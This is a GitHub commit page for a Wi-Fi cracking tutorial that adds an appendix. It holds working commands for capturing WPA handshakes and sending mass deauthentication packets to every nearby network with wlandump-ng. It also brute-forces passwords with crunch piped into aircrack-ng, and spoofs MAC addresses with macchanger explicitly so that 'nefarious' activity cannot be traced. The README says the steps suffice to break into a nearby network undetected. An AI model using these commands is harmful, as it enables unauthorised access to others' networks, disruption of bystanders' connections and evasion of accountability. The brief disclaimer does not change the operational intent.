Skip to content

Commit

Permalink
Add appendix.md and version bump to v1.1
Browse files Browse the repository at this point in the history
  • Loading branch information
@brannondorsey
brannondorsey committed Jul 30, 2017
1 parent 23e2688 commit e423fb2
Show file tree
Hide file tree
Showing 3 changed files with 155 additions and 68 deletions.
12 changes: 12 additions & 0 deletions CHANGELOG.md
View file
Original file line number Diff line number Diff line change
@@ -0,0 +1,12 @@
# Changelog

## 1.1

- Add [appendix](appendix.md)
- Handshake capture with `wlandump-ng`
- Programatic wordlist generation with `crunch`
- Macchanger info

## 1.0

- Original tutorial with rolling changes for small updates and typos, etc...
90 changes: 22 additions & 68 deletions README.md
View file
Original file line number Diff line number Diff line change
Expand Up @@ -4,7 +4,7 @@ Crack WPA/WPA2 Wi-Fi Routers with Airodump-ng and [Aircrack-ng](http://aircrack-

This is a brief walk-through tutorial that illustrates how to crack Wi-Fi networks that are secured using weak passwords. It is not exhaustive, but it should be enough information for you to test your own network's security or break into one nearby. The attack outlined below is entirely passive (listening only, nothing is broadcast from your computer) and it is impossible to detect provided that you don't actually use the password that you crack. An optional active deauthentication attack can be used to speed up the reconnaissance process and is described at the [end of this document](#deauth-attack).

If you are familiar with this process, you can skip the descriptions and jump to a list of the commands used at [the bottom](#list-of-commands).
If you are familiar with this process, you can skip the descriptions and jump to a list of the commands used at [the bottom](#list-of-commands). For a variety of suggestions and alternative methods, see the [appendix](appendix.md).

__DISCLAIMER: This software/tutorial is for educational purposes only. It should not be used for illegal activity. The author is not responsible for its use. Don't be a dick.__

Expand Down Expand Up @@ -162,86 +162,32 @@ If the password is cracked you will see a `KEY FOUND!` message in the terminal f
KEY FOUND! [ hacktheplanet ]
Master Key : A1 90 16 62 6C B3 E2 DB BB D1 79 CB 75 D2 C7 89
59 4A C9 04 67 10 66 C5 97 83 7B C3 DA 6C 29 2E
Master Key : A1 90 16 62 6C B3 E2 DB BB D1 79 CB 75 D2 C7 89
59 4A C9 04 67 10 66 C5 97 83 7B C3 DA 6C 29 2E
Transient Key : CB 5A F8 CE 62 B2 1B F7 6F 50 C0 25 62 E9 5D 71
2F 1A 26 34 DD 9F 61 F7 68 85 CC BC 0F 88 88 73
6F CB 3F CC 06 0C 06 08 ED DF EC 3C D3 42 5D 78
8D EC 0C EA D2 BC 8A E2 D7 D3 A2 7F 9F 1A D3 21
Transient Key : CB 5A F8 CE 62 B2 1B F7 6F 50 C0 25 62 E9 5D 71
2F 1A 26 34 DD 9F 61 F7 68 85 CC BC 0F 88 88 73
6F CB 3F CC 06 0C 06 08 ED DF EC 3C D3 42 5D 78
8D EC 0C EA D2 BC 8A E2 D7 D3 A2 7F 9F 1A D3 21
EAPOL HMAC : 9F C6 51 57 D3 FA 99 11 9D 17 12 BA B6 DB 06 B4
EAPOL HMAC : 9F C6 51 57 D3 FA 99 11 9D 17 12 BA B6 DB 06 B4
```

#### Cracking With Aircrack-ng combined with crunch

Crunch is a tool to generate combinations of given string or pattern.We can use crunch to generate password list to avoid use of wordlist. Time required depends on your system configurations.

Now, we need to install crunch
```bash
sudo apt-get install crunch
```

Now, use crunch with Aircrack-ng

```bash
# syntex 8 8 are min-length and max-length of password to generate
# 01234567890 is set of elements to construct password
# we can also use -t "@^%," to use pattern '@' - replaced with lowercase ',' - replaced with uppercase
# '%' - replaced with numbers and '^' - is replaced with special chars
# *************** don't forget '-' at the end
crunch 8 8 0123456789 | aircrack-ng -a2 'PATH-TO-CAP-FILE'.cap -b 58:98:35:CB:A2:77 -w -
```

An example to crack with 10 digit phone number using -t parameter
```bash
crunch 10 10 -t "%%%%%%%%%%" | aircrack-ng -a 2 XXXXXX.cap -b XX:XX:XX:XX:XX:XX -w -
Crunch will now generate the following amount of data: 110000000000 bytes
104904 MB
102 GB
0 TB
0 PB
Crunch will now generate the following number of lines: 10000000000
Opening XXXXX.cap
Reading packets, please wait...

Aircrack-ng 1.2 rc4


[00:00:17] 16012 keys tested (1039.35 k/s)


Current passphrase: 0000015981


Master Key : B0 EA 2A 5B D3 81 A1 BE D0 7D E3 C3 92 03 55 51
C9 5A 68 5E 3C 1D 9F 64 B5 9D 3D FA 5E A9 48 DC

Transient Key : C0 30 AB 37 E6 CD BB 40 CE 34 56 F7 BD 13 71 3C
63 77 D8 71 21 2A 7F 6F 0A 89 CE AE 70 36 46 E8
C8 65 91 37 17 57 46 82 92 8B 8C 56 79 FC 0A 2A
18 A0 F6 B2 3B C7 9F 86 87 6D 4D D2 08 38 8F 71

EAPOL HMAC : AD 9B E6 04 BC 8B C5 0A 0F 72 68 CE D0 BD BC 5A
```

Everything else is same as above just dictionary file is replaced with generated passwords.

## Deauth Attack

A deauth attack sends forged deauthentication packets from your machine to a client connected to the network you are trying to crack. These packets include fake "sender" addresses that make them appear to the client as if they were sent from the access point themselves. Upon receipt of such packets, most clients disconnect from the network and immediately reconnect, providing you with a 4-way handshake if you are listening with `airodump-ng`.
A deauth attack sends forged deauthentication packets from your machine to a client connected to the network you are trying to crack. These packets include fake "sender" addresses that make them appear to the client as if they were sent from the access point themselves. Upon receipt of such packets, most clients disconnect from the network and immediately reconnect, providing you with a 4-way handshake if you are listening with `airodump-ng`.

Use `airodump-ng` to monitor a specific access point (using `-c channel --bssid MAC`) until you see a client (`STATION`) connected. A connected client look something like this, where is `64:BC:0C:48:97:F7` the client MAC.

```
CH 6 ][ Elapsed: 2 mins ][ 2017-07-23 19:15 ]
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
9C:5C:8E:C9:AB:C0 -19 75 1043 144 10 6 54e WPA2 CCMP PSK ASUS
BSSID STATION PWR Rate Lost Frames Probe
9C:5C:8E:C9:AB:C0 64:BC:0C:48:97:F7 -37 1e- 1e 4 6479 ASUS
```

Expand Down Expand Up @@ -298,8 +244,16 @@ cap2hccapx.bin capture/-01.cap capture/-01.hccapx
HASH_FILE=hackme.hccapx POT_FILE=hackme.pot HASH_TYPE=2500 ./naive-hashcat.sh
```

## Appendix

The response to this tutorial was so great that I've added suggestions and additional material from community members as an appendix. Check it out to learn how to:

- Capture handshakes from every network around you with `wlandump-ng`
- Use `crunch` to generate 100+GB wordlists on-the-fly
- Spoof your MAC address with `macchanger`

## Attribution

Much of the information presented here was gleaned from [Lewis Encarnacion's awesome tutorial](https://lewiscomputerhowto.blogspot.com/2014/06/how-to-hack-wpawpa2-wi-fi-with-kali.html). Thanks also to the awesome authors and maintainers who work on Aircrack-ng and Hashcat.

Shout out to [DrinkMoreCodeMore](https://www.reddit.com/user/DrinkMoreCodeMore), [hivie7510](https://www.reddit.com/user/hivie7510), [cprogrammer1994](https://github.com/cprogrammer1994), [0XE4](https://github.com/0XE4), [hartzell](https://github.com/hartzell), [zeeshanu](https://github.com/zeeshanu), [flennic](https://github.com/flennic), [bhusang](https://github.com/bhusang), [tversteeg](https://github.com/tversteeg), [gpetrousov](https://github.com/gpetrousov), [crowchirp](https://github.com/crowchirp) and [Shark0der](https://github.com/shark0der) who also provided suggestions and typo fixes on [Reddit](https://www.reddit.com/r/hacking/comments/6p50is/crack_wpawpa2_wifi_routers_with_aircrackng_and/) and GitHub. If you are interested in hearing some proposed alternatives to WPA2, check out some of the great discussion on [this](https://news.ycombinator.com/item?id=14840539) Hacker News post.
Shout out to [hiteshnayak305](https://github.com/hiteshnayak305), [enilfodne](https://github.com/enilfodne), [DrinkMoreCodeMore](https://www.reddit.com/user/DrinkMoreCodeMore), [hivie7510](https://www.reddit.com/user/hivie7510), [cprogrammer1994](https://github.com/cprogrammer1994), [0XE4](https://github.com/0XE4), [hartzell](https://github.com/hartzell), [zeeshanu](https://github.com/zeeshanu), [flennic](https://github.com/flennic), [bhusang](https://github.com/bhusang), [tversteeg](https://github.com/tversteeg), [gpetrousov](https://github.com/gpetrousov), [crowchirp](https://github.com/crowchirp) and [Shark0der](https://github.com/shark0der) who also provided suggestions and typo fixes on [Reddit](https://www.reddit.com/r/hacking/comments/6p50is/crack_wpawpa2_wifi_routers_with_aircrackng_and/) and GitHub. If you are interested in hearing some proposed alternatives to WPA2, check out some of the great discussion on [this](https://news.ycombinator.com/item?id=14840539) Hacker News post.
121 changes: 121 additions & 0 deletions appendix.md
View file
Original file line number Diff line number Diff line change
@@ -0,0 +1,121 @@
# Appendix

After the initial release of this tutorial, several people from various corners of the internet reached out with comments and suggestions. Two of the most interesting are alternative methods for capturing 4-way handshakes using `wlandump-ng` and programatically generating wordlists for Aircrack-ng using `crunch`. In an effort two keep the original tutorial short and sweet, I've included information about their wonderful suggestions here, and added a few of my own.

## Capturing handshakes with `wlandump-ng`

[@enilfodne](https://github.com/enilfodne) has [informed me](https://github.com/brannondorsey/wifi-cracking/issues/15) that the hashcat community has a prefered tool for capturing WPA 4-way handshakes, called `wlandump-ng`. This tool belongs to a suite of hashcat related utilities called [hcxtools](https://github.com/ZerBea/hcxtools) developed by [ZerBea](https://github.com/ZerBea), and has notable perks over `airdump-ng`. `wlandump-ng` allows you to blanket capture handshakes from every nearby network at once, hopping Wi-Fi channels in order to increase collection.


```bash
# clone hcxtools
git clone https://github.com/ZerBea/hcxtools
cd hcxtools

# build and install
# you will likely need to apt install the required dependencies:
# https://github.com/ZerBea/hcxtools#requirements
make
sudo make install

# blanket death connected clients from all nearby access points and listen for re-connections
# replace wlan0 with your wireless device name
wlandump-ng -i wlan0 -o capture.cap -c 1 -t 60 -d 100 -D 10 -m 512 -b -r -s 20

# once you've got a capture file, you can convert it to the hashcat capture format with
cap2hccapx.bin capture.cap capture.hccapx
```

`wlandump-ng` command-line args (use `-h` flag for full list):

- `-c 1`: start in the 2.4Ghz range from channel 1 (will go to 13)
- `-t 60`: stay on each channel for 60s (experiment with lower values, default is `5`)
- `-d 100`: send deauth every 100 beacon frames
- `-D 10`: send disassosciation packets every 10 beacons frames
- `-m 512`: internal ringbuffer size, use 512 for low resource machines
- `-b`: activate beaconing to last 10 probe requests
- `-r`: reset deauthentication/disassosciation counter if hop loop is on channel 1
- `-s 20`: display 20 status lines

**WARNING:** Using this is likely illegal in most places. See [here](https://github.com/ZerBea/hcxtools#warning) for more info.

`wlandump-ng` also offers the option to run in passive mode without transmitting any deauth/disassociation frames. This is recommended if you are are sensitive to disrupting the network activity of those around you (which you should be). The trade-off is that you will capture far fewer handshakes, but this method makes the capture undetectable.

```bash
# run with default settings in passive mode
wlandump-ng -i wlan0 -o capture.cap -p -s 20
```

## Generating wordlists with `crunch`

`crunch`is a tool to generate wordlists using combinations of a given string or pattern. We can use crunch to generate a password list on-the-fly and pipe it to `aircrack-ng` without having the wordlist saved to disk.

```bash
# install crunch
sudo apt-get install crunch
```

To get an idea of how crunch works, run it from the command-line (be ready to press `ctrl-c` once it starts spewing passwords):

```bash
# syntax 8 8 are min-length and max-length of password to generate
# 01234567890 is the set of characters to combine/permute to construct the passwords
crunch 8 8 0123456789
```

```
Crunch will now generate the following amount of data: 900000000 bytes
858 MB
0 GB
0 TB
0 PB
Crunch will now generate the following number of lines: 100000000
00000000
00000001
00000002
00000003
00000004
00000005
00000006
00000007
00000008
00000009
...
99999999
```

We can pipe the output of `crunch` as the input to `aircrack-ng`, using the passwords that it generates as our wordlist. Here we use the `crunch` special rule character `%` to denote a digit. This command attempts to crack WPA passwords that are 10-digit phone numbers (using 102GB of numbers generated by crunch on-the-fly):

```bash
# we can also use -t "@^%," to use pattern '@' - replaced with lowercase ',' - replaced with uppercase
# '%' - replaced with numbers and '^' - is replaced with special chars
# *************** don't forget '-' at the end
crunch 10 10 -t "%%%%%%%%%%" | aircrack-ng -a2 capture.cap -b 58:98:35:CB:A2:77 -w -
```

Thanks to [@hiteshnayak305](https://github.com/hiteshnayak305) for the introduction to `crunch` and including this update as a [PR](https://github.com/brannondorsey/wifi-cracking/pull/17).

## Macchanger

Whenever you are doing anything remotely nefarious with Wi-Fi, it is a good idea to spoof your the MAC address of your Wi-Fi device so that any network traffic that gets recorded can't be tied to serial assigned by your device manufacturer.

This is trivial with `macchanger`:

```bash
# download MAC changer
sudo apt-get install macchanger

# bring the device down
sudo ifconfig wlan0 down

# change the mac
# -A pics a random MAC w/ a valid vendor
# -r makes it truly random
# -p restores it to the original hardware MAC
sudo macchanger -A wlan0

# bring the device back up
sudo ifconfig wlan0 up
```

If you've got multiple cards, it might also be a good idea to do this to all of them. Or better yet, bring unused wireless interfaces down whenever you are attempting to capture handshakes, to leave as little trace as possible. Note that spoofing changes do not persist across reboots.

0 comments on commit e423fb2

Please sign in to comment.